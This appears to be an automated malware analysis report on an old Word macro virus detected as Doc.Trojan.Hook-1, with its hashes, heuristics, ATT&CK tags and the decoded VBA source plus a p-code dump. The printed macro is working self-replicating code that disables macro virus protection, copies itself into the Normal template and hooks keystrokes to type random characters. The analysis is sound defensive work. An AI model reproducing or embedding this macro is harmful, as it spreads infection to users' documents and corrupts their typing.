Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 15118a07b42b5de5…

MALICIOUS

Office (OLE)

33.5 KB Created: 1999-06-12 15:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c8ec572c92d0fd16716d24c81a0a0b92 SHA-1: ced838b91c51897b3b2a16a0766091d6bcfc7a6c SHA-256: 15118a07b42b5de5c44085235defed4e73ed2349e18ac417f35932391f94a1bb
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a critical heuristic firing. The macro attempts to disable macro security and inject its code into the Normal template and the active document. It also attempts to add key bindings, which could be used for further obfuscation or execution. The presence of the Document_Open macro and the code manipulation strongly suggests an attempt to establish persistence or prepare for further payload execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Hook-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hook-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4125 bytes
SHA-256: 5e7c9f1abb0e4e381595bb31d52dc8784da212631ff7de566b3fe76827046f99
Detection
ClamAV: Doc.Trojan.Hook-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Visible = False

Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TD = ThisDocument.VBProject.VBComponents(1).CodeModule
VCode = TD.Lines(1, TD.CountOfLines)
NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
AD.DeleteLines 1, AD.CountOfLines: AD.InsertLines 1, VCode

Randomize Selection.StoryLength
If (Int(Rnd * Selection.StoryLength)) < Selection.StoryLength Then
    For i = 1 To 25
        Application.KeyBindings.Add 2, "ThisDocument.Key_Hook", 64 + i
    Next
End If
End Sub
Private Sub Document_Close()
Application.KeyBindings.ClearAll
End Sub
Private Sub Key_Hook()
System.Cursor = wdCursorIBeam
Selection.TypeText Chr(Int(Rnd * 255))
System.Cursor = wdCursorIBeam
'// Have a nice day //
'// written by  Lord Arz [TI] //
End Sub

' Processing file: /opt/analyzer/scan_staging/980122d4e714414b9669c60fa5de8371.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5794 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitVarSpecial (False)
' 	LitDI2 0x000C 
' 	LitStr 0x0005 "Tools"
' 	Ld Application 
' 	ArgsMemLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Visible 
' Line #5:
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set TD 
' Line #9:
' 	LitDI2 0x0001 
' 	Ld TD 
' 	MemLd CountOfLines 
' 	Ld TD 
' 	ArgsMemLd Lines 0x0002 
' 	St VCode 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd CountOfLines 
' 	Ld NT 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld VCode 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld AD 
' 	MemLd CountOfLines 
' 	Ld AD 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld VCode 
' 	Ld AD 
' 	ArgsMemCall InsertLines 0x0002 
' Line #12:
' Line #13:
' 	Ld Selection 
' 	MemLd StoryLength 
' 	ArgsCall Read 0x0001 
' Line #14:
' 	Ld Rnd 
' 	Ld Selection 
' 	MemLd StoryLength 
' 	Mul 
' 	FnInt 
' 	Paren 
' 	Ld Selection 
' 	MemLd StoryLength 
' 	Lt 
' 	IfBlock 
' Line #15:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0019 
' 	For 
' Line #16:
' 	LitDI2 0x0002 
' 	LitStr 0x0015 "ThisDocument.Key_Hook"
' 	LitDI2 0x0040 
' 	Ld i 
' 	Add 
' 	Ld Application 
' 	MemLd KeyBindings 
' 	ArgsMemCall Add 0x0003 
' Line #17:
' 	StartForVariable 
' 	Next 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	EndSub 
' Line #20:
' 	FuncDefn (Private Sub Document_Close())
' Line #21:
' 	Ld Application 
' 	MemLd KeyBindings 
' 	ArgsMemCall ClearAll 0x0000 
' Line #22:
' 	EndSub 
' Line #23:
' 	FuncDefn (Private Sub Key_Hook())
' Line #24:
' 	Ld wdCursorIBeam 
' 	Ld System 
' 	MemSt Cursor 
' Line #25:
' 	Ld Rnd 
' 	LitDI2 0x00FF 
' 	Mul 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Ld Selection 
' 	ArgsMemCall TypeText 0x0001 
' Line #26:
' 	Ld wdCursorIBeam 
' 	Ld System 
' 	MemSt Cursor 
' Line #27:
' 	QuoteRem 0x0000 0x0015 "// Have a nice day //"
' Line #28:
' 	QuoteRem 0x0000 0x001F "// written by  Lord Arz [TI]
... (truncated)